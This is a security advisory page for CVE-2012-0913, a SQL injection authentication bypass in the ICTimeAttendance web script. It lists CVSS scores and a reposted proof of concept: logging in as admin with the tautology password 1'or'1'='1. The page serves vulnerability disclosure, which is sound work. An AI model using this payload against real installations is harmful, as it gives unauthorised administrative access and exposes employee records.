ICTimeAttendance SQL Injection Vulnerability

Published / (Updated)
Credit
Risk
2012-01-20 / 2012-01-30
v3n0m
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2012-0913
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

-----------------------------------------------------------------------
ICTimeAttendance Authentication Bypass Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : January, 19-2012
Location : Jakarta, Indonesia
Time Zone : GMT +7:00

Application : ICTimeAttendance - Time attendance script
Price : $57.09
Vendor : http://www.icloudcenter.com/

Exploit & p0c
_____________

go to
http://domain.tld/[path]/index.html

then login with
Username : admin
Password : 1'or'1'='1

ShoutZ
______

All YOGYACARDERLINK CREW

References:

http://yogyacarderlink.web.id/
http://www.icloudcenter.com/
http://xforce.iss.net/xforce/xfdb/72569
http://www.securityfocus.com/bid/51589
http://www.exploit-db.com/exploits/18394
http://osvdb.org/78444


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com